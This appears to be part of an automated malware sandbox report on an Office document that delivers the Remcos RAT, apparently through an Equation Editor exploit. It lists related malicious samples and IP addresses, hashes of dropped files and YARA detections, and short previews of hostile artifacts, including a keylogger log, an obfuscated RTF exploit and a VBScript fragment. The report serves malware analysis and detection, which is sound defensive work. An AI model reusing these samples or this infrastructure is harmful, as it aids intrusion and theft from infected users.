                                                                                                                                                                    1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    TTSLMEIS-AS-APTTSL-ISPDIVISIONINPO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                    • 49.200.247.241
                                                                                                                                                                    x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 14.195.61.251
                                                                                                                                                                    botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 14.194.227.99
                                                                                                                                                                    Z2X8cP8r7S.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 49.248.226.120
                                                                                                                                                                    fPqdDUeLwj.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                    • 49.200.200.206
                                                                                                                                                                    ksxhUwe4q5.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                    • 182.158.23.255
                                                                                                                                                                    FkrW3aRKek.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 14.194.50.72
                                                                                                                                                                    uvaXiyELu9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 14.194.130.217
                                                                                                                                                                    mg7INGUtNT.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 14.194.239.75
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    05af1f5ca1b87cc9cc9b25185115607dPO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    na.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    7dcce5b76c8b17472d024758970a406bPO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    No context
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):436
                                                                                                                                                                    Entropy (8bit):3.52805447782379
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:6lJVlWuql55YcIeeDAl7O6YwSySNombQDywk+M6V1FSNos9gQ1HWAv:6lJ8hecYLwhykvkz6V1FugaHW+
                                                                                                                                                                    MD5:B58E20C3BE5F9E67AAA8B2D60A95C20A
                                                                                                                                                                    SHA1:9C506061C62AA07656199CCE07D64171BFFC7A8B
                                                                                                                                                                    SHA-256:CC5C23BFA33B173BAF9E76B33B80FB9256037825C8EE10066767807CF3EA4612
                                                                                                                                                                    SHA-512:8AC041A54DDE8AC5DAD4E40BA39B295D27A6E3C641D2020A6F24DB2813CD19FA839D5DB60E2F76C8FD1E42960E40722A826D22EF4614FC1685129E904D12E76E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                    Preview:....[.2.0.2.4./.1.0./.0.7. .0.8.:.5.3.:.1.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.d.1.a.1. .[.R.e.a.d.-.O.n.l.y.]. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .i.n.v.o.i.c.e._.4.5.0.0.9. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].....[.C.t.r.l.L.].....[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):131072
                                                                                                                                                                    Entropy (8bit):0.025506844008816903
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:I3DPcEDmhQvxggLR3GKbHRZ9rNM3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP9Dmh2bTjRDrNavYg3J/
                                                                                                                                                                    MD5:0B9A7FF55133B88C37B8B7ACAC55BFEC
                                                                                                                                                                    SHA1:E8198259AE974B1065C2D94D88B8EE9426A15A14
                                                                                                                                                                    SHA-256:9FBC87913323F64184575DDF9679AF9842571345CC9A2EFF736D0D754288FA18
                                                                                                                                                                    SHA-512:90175CA52221E226AA53FF3301C753D0BA91E72438704136245D0BB41DC1D4361977A4AFD616E3E0099D7C21E3FF5876520B95CF8B62E0A4C195AD0047B8EDE8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......M.eFy...z.....Q.F.....XI.S,...X.F...Fa.q................................w{.H..c.R..........^w.S.rO.N/.p(.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4760
                                                                                                                                                                    Entropy (8bit):4.834060479684549
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                                                                                                    MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                                                                                                    SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                                                                                                    SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                                                                                                    SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:@...e...........................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                    Entropy (8bit):5.013130376969173
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                    MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                                                                                                                                    SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                                                                                                                                    SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                                                                                                                                    SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Rich Text Format data, version 1
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):99586
                                                                                                                                                                    Entropy (8bit):2.4656440672570867
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:60XcXGHfyJ/XLT7WfTJ0F40oLZEePTsGetX1llI+d+VvzXJ/Gjushnhypehs5VPN:6NOk7T6fMBePTs7tF7I45Z0j9N
                                                                                                                                                                    MD5:3A621C6AFB9D50D0F4E10896B31626CC
                                                                                                                                                                    SHA1:1B651C7451642AB266E8B8F9A8CA129616F6FD41
                                                                                                                                                                    SHA-256:CE860A9ED10D93ACFFF92D6FED47EDBA9AC0EDC7183C942B64946C0931C119FD
                                                                                                                                                                    SHA-512:FF11352FB2CE92C1710295468129F6BE3ABB5725FF5B780565A7A35A890D789C8A901493521AFF5A68AA8B007ECA7072B8A715C1DE005FB87EC90152B670CA31
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____verynic[1].doc, Author: ditekSHen
                                                                                                                                                                    Preview:{\rtf1..{\*\AqehQ4I8EUklcnb9szOy4fqMtZLWjKZg1RWAncfqXFTkF8ywlatgLcgpVV7T6Yslb2cBla3nOdWyP8aHEh4aJkDR06AnZidobfr1WVrlQgojFLpyvMqw8asx0NQnJLDaeN9zBuTWKRFHuH7mVb73wf3ACMmjSy3sQAOKvJIsjvkvaUqUdSoCuW9qE}..{\646097595(*;2%~=+?/#^%!|4:.;';?%2%./?]62`[;-?/~?.).+)@<.|]%/]?_.(+4?9%?||<;6778*.?(!45#<&]??/|./~.,=)-9?=#[71$;/!:);?|.7@%)-`'2#]|6+;:=.?.?1*_^=8.'=:/2?_>`!14).53?^^[=.?~3%~29,8,_>@5?8@=~:%@;93~1!.9[`*-.+?7.5$[?<#.12'8!%)12-*6?&.+[8'..^.`/`>[557!99?&.?[|3??=|4?6@;-6=,;@~7'/5>1.`=0=8,118`3??#:%.?|~9;.!#*?[&5+*4:#?%.).2/$9~0#_?`%]4:-9:2%-%1?.6)`&%8%~?[/&?4+/9?1!?5?1+_8&)%8;;?<,>/30=<$9@?.=8#.$&%=6*3?6.@,8/#8?>8'%&7![&5.4!8^[]49@^)3[7&.&*.9?.>9%0,..5?1%2<]?<?_@^,#6;5%1(<>?>(?>).&/,);?.&<#?=2<?+:@-.`((_#!@.+0!?~'|%47%?8;!19|/,@`5=]`@=+$21(%.~'/!5%+*?+$25~?$&(.(^$*4-%?#)%->-#:?9~>|*;=],^;%@?<#0.~&%??,#>.8(`4.'$%4$#+,?~.?7<;@4?`<[*3-`(2)?.]5$1??826361^).*.*29???[%-1-*9?82.+#31&@.%_?&2%;`.*95?|5.?2.+???^[[+47'54%.==+?:!>~<[.9#.0006/%.$1(@.?=~[0|;;@!?%+%.?79?>@47`5~'>`??.44.%?77.:'?1&.;7]|_!38=/
                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):194434
                                                                                                                                                                    Entropy (8bit):3.7261905667604673
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:azeQUsdSmY4+DxihGtPgt5pRGwTFiLk0KCwOh/w5YWpUZ:at+VxT60Tq5YWpA
                                                                                                                                                                    MD5:C3B10EFAA54F302A05428F1CC7C58EC4
                                                                                                                                                                    SHA1:A773D0FB6A8F58292954658753D0175538DB5CE5
                                                                                                                                                                    SHA-256:919C5984C4BABC8F1FD94161EE2B6D15149F1C91B0043912E99EF033F8AAC8B9
                                                                                                                                                                    SHA-512:DA97ADF8F68B6737183EB2E85F235FAACBA093589BB93C7CBEA4AF3B0FFEC8BA2133C0228F18BD61B9374FC8DD6B04BF99CEA2F309837CF8E85C4273813C50F6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .r.o.x.e.a.r.(.c.a.n.d.e.l.a.,. .e.s.t.r.o.p.e.a.m.e.n.t.o.,. .h.y.p.o.p.l.a.s.i.a.,. .e.s.t.a.l.a.j.a.d.e.i.r.a.,. .a.d.a.g.i.e.i.r.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .h.y.p.o.p.l.a.s.i.a...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .h.y.p.o.p.l.a.s.i.a...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .h.y.p.o.p.l.a.s.i.a...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .h.y.p.o.p.l.a.s.i.a...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):76472
                                                                                                                                                                    Entropy (8bit):3.025081600163608
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:luYYST5PIYfLe2b52XPl6hAJC00EddMdf0Ii90Z5xxr8sdEdeC:4igYfqg52XPl6hAJC0irRHC
                                                                                                                                                                    MD5:A4B79FF3D7725F69AB98C49A72805D64
                                                                                                                                                                    SHA1:8617AF425CE74F816B2CE28FF7BF08A7F5317030
                                                                                                                                                                    SHA-256:2DE8B86E62DE48780D92E82B3132F559DF0324A000F9BAFC8CAF3D2789D17CE5
                                                                                                                                                                    SHA-512:3B7E25DBDFDAD51FFD8DB140091405FABD3242704C0FD0517CEB10C59E5AF57098CA41C3DCA9F9E80045D8A75EE8415927467457E636EA475C0BE95063C94C49
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:....l..............................eQ.. EMF.....*..y.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................L...d.......).......G.......)...........!..............?...........?............................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8084
                                                                                                                                                                    Entropy (8bit):2.570503528684488
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:j+RiOO++Z397Q2Acgze0xBdEQzBfCC7Boff8oBJ6ANQ4HJV:jt7ecgKgvzBArH
                                                                                                                                                                    MD5:A0D51FBAA34316A0B3E02FA2B5BEA0B8
                                                                                                                                                                    SHA1:01B3F570EFCA831762B154AC65E11C122319D35D
                                                                                                                                                                    SHA-256:BC55995ADDDFBE0105BDACE8E1603EA7E9DA698C0BDC7E91F043578BF6B28157
                                                                                                                                                                    SHA-512:93E08DF7E102CCD3D9077284E1E80369A21BA86B9194B72528BB140ABA83E65E7E2DC59471E2484AE805AF1C13E41C6A5273150E2EFAB06CABFA21BC889405E5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2342852
                                                                                                                                                                    Entropy (8bit):2.6417290025884554
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                                                    MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                                                    SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                                                    SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                                                    SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):38272
                                                                                                                                                                    Entropy (8bit):2.8200425031385645
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:6/UjPGlVrhaHoq7x0ii1lild6rMT54GtXU+j9hMQmlC+a6gz5nCf5OBgJP+SKA:6/1MH61lq4GtXJMQmlC+a6gz5SOyJ1/
                                                                                                                                                                    MD5:C898CDC91D0BD5EFB41E576B8A19E931
                                                                                                                                                                    SHA1:B9ED5CAC5A526CF8095AB8F8CE36C39F78422407
                                                                                                                                                                    SHA-256:044E7012311B28991E687A081E1AC94B7D7EB80F1BE1970F519E949D01A05CA2
                                                                                                                                                                    SHA-512:6BCD700AAB23B2205E8294C3071158CA42D4BA6B4B098CA6B511A386FF2E1F8D6B6A3BED4F307475F03161F96425194DEA5581411D3544E95F6D17BCD3264019
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):884312
                                                                                                                                                                    Entropy (8bit):1.2944965349348616
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                                                                                                                                                    MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                                                                                                                                                    SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                                                                                                                                                    SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                                                                                                                                                    SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):47012
                                                                                                                                                                    Entropy (8bit):3.1531816149141645
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:Gb1LMfEQ8zciTFRGYQeaxANozuH099A3xBAms0B8h4RofBbtNm:X58zvTbyebozuHP3AX0K2RMJi
                                                                                                                                                                    MD5:F22BA39565567A37C31F51C25A847958
                                                                                                                                                                    SHA1:A460CF705A7F08B3A49449E0C987E970DDB1D013
                                                                                                                                                                    SHA-256:E8B091C48B13AE9A76652A204973829357BD6E9F95F4E495A22E68BE0C14B9D4
                                                                                                                                                                    SHA-512:DD6D2D781F14093A391F3F24287CB82E7002A8E863041367AAD3B73D778AC42233AFAC0B2B44507F770438A581B66E978DA2F7A08E389768386F3533A04AF93A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:....l...........N................@.._Y.. EMF........E.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................O.......%...........%...........R...p................................@. C.a.l.i.b.r.i..........................................................................................2%.........d.................................................................7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i.......................................................................................P.C......................................................................7......................@.N..............C.a.l.i.b.r.i...........
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    File Type:Rich Text Format data, version 1
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):99586
                                                                                                                                                                    Entropy (8bit):2.4656440672570867
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:60XcXGHfyJ/XLT7WfTJ0F40oLZEePTsGetX1llI+d+VvzXJ/Gjushnhypehs5VPN:6NOk7T6fMBePTs7tF7I45Z0j9N
                                                                                                                                                                    MD5:3A621C6AFB9D50D0F4E10896B31626CC
                                                                                                                                                                    SHA1:1B651C7451642AB266E8B8F9A8CA129616F6FD41
                                                                                                                                                                    SHA-256:CE860A9ED10D93ACFFF92D6FED47EDBA9AC0EDC7183C942B64946C0931C119FD
                                                                                                                                                                    SHA-512:FF11352FB2CE92C1710295468129F6BE3ABB5725FF5B780565A7A35A890D789C8A901493521AFF5A68AA8B007ECA7072B8A715C1DE005FB87EC90152B670CA31
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5BBC488.doc, Author: ditekSHen
